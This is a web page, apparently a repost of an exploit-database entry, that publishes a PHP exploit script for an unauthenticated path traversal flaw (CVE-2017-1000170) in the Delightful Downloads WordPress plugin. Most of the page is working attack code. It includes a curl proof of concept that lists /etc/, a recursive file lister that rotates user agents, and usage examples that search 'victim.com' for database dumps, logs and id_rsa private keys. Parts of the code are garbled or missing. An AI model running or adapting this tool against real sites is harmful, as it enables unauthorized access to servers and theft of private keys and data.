WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 – Path Traversal – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 22nd, 2021 📆 | 6543 Views ⚑

0

WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 – Path Traversal

[*]

[*]# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: < =1.6.6 # Tested on: Debian 11 # CVE : CVE-2017-1000170 # PHP version (exploit): 7.3.27 # POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php $data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
if($random_agent){
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
}

$output = curl_exec($ch);
curl_close($ch);
return $output;
}

function parse_dir($str){ // by raina77ow =)
$contents = array();
$startFrom = $contentStart = $contentEnd = 0;
while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
$contentStart += 5;
$contentEnd = strpos($str, '">', $contentStart);
if (false === $contentEnd){
break;
}
$contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
$startFrom = $contentEnd + 2;
}
return $contents;
}

function list_files($url,$path, $recursive=0,$filter){
global $vuln_file;
global $recursive;
global $random_agent;
$exts = "";
$extensions = "";
$files = "";
(count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;

$parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree

foreach($parsed as $file_or_folder){
if($has_filter){
foreach($filter as $filtered){
if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
echo " ".$file_or_folder."n";
continue;
}
if(preg_match_all("#^/.*/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}
continue 2; // continue the outermost foreach
}
}
continue; // if has filter, always restart the loop here
}

if(preg_match_all("#^/.*/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}else{
echo " ".$file_or_folder."n"; //if it's not to be recursive, just print the folder name
}
}else{ //is a file
echo " ".$file_or_folder."n";
}
continue;
}
}

function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
if($path == "/" && $recursive == 1){
echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can
exceed the timeout limit, block your IP or even take down the server.
Are you sure you want to continue? [y/N] ");
$handle = fopen ("php://stdin","r");
$line = fgets($handle);
if(trim(strtoupper($line)) != 'Y'){
echo "n Aborted. Try running me without the recursion flagnn";
exit;
}
fclose($handle);
echo cyan("nn Ok, don't say I didn't warn you...n");
}
list_files($target,$path, $recursive, $filter);
}

############################################################

function green($str){
return "e[92m".$str."e[0m";
}
function red($str){
return "e[91m".$str."e[0m";
}
function yellow($str){
return "e[93m".$str."e[0m";
}
function cyan($str){
return "e[96m".$str."e[0m";
}

function banner(){
echo "
_____ _ _ _ _ __ _ _______
| __ | (_) | | | | / _| | |__ __|
| | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___
| | | |/ _ | |/ _` | _ | __| _| | | | | | | ´__/ _ / _
| |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/
|_____/ ___|_|_|__, |_| |_|__|_| __,_|_| |_|_| ___|___|
__/ | ".green("Coder: ").yellow("Nicholas Ferreira")."
|___/ 0x7359

".cyan("Delightful Downloads - Jquery File Tree")."
Unauthenticated Path Traversal exploit ".
red("n (CVE-2017-1000170)")."

";
}

// ======================= CHECKING =======================

$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);

if($argc == 1){
die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]nn Help: -h or --helpnn");
}

if(isset($options['h']) || isset($options['help'])){
banner();
die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]

-h, --help: Show this message
-u, --url: URL of target
-a, --random-agent: Use random user agents
-f, --filter: Name of files or extensions to search for (separated by comma)
-p, --path: The full path from which the filenames will be read (default: /)
-r, --recursive: Generates the tree recursivelly (be careful)

e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
|
-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
(You must provide the dot to indicate it's an extension)

".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
|
-> This will search for all files named "id_rsa" or having the extension
".log" within all folders of the server, with random user-agents

".yellow("Tip: use "php ..... | tee output" to save the result to an output file")."

");

}

$random_agent = 0;
if(isset($options['a'])){
$random_agent = 1;
}elseif(isset($options['random-agent'])){
$random_agent = 1;
}

$target = "";
if(isset($options['u'])){
$target = $options['u'];
}elseif(isset($options['url'])){
$target = $options['url'];
}

$recursive = 0;
if(isset($options['r'])){
$recursive = 1;
}elseif(isset($options['recursive'])){
$recursive = 1;
}

$path = "/";
if(isset($options['p'])){
$path = $options['p'];
}elseif(isset($options['path'])){
$path = $options['p'];
}

if($path !== "/"){
if(!preg_match("#^/.*/$#", $path)){
$path = str_replace("//", "/", "/".$path."/"); // $path must be of the form // for this to work, so lets force it
}
}

$extensions = "";
if(isset($options['f'])){
$extensions = $options['f']; //strings
}elseif(isset($options['filter'])){
$extensions = $options['filter']; //string
}

$filter = array();

if($extensions !== ""){
$filter = explode(",", $extensions);
}

// ========================= END CHECKING ==========================

function is_vulnerable($url){
global $vuln_file;
global $random_agent;
global $filter;

echo " [*] Target: ".$url."n";
if(count($filter) > 0){
echo " [*] Filter: ".implode(", ", $filter)."nn";
}
echo cyan(" [i] Checking if the target is vulnerable...n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if(substr($code,0,1) == 2){ // 2xx
echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!n");
$post = post_request($url.$vuln_file, "/", $random_agent);
if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
echo green(" [+] Target is vulnerable! Getting file list...nn");
return true;
}
echo red(" [-] Target is not vulnerable... =(nn");
}else{
echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist,
you don't have permission to read it or it is in another directory.n");
}
return false;
}
banner();

if(is_vulnerable($target)){
global $filter;
alert_user($target,$path, $recursive, $filter);
echo green("n [+] Done!nn");
}

?>

Source link

Tagged with:



Leave a Reply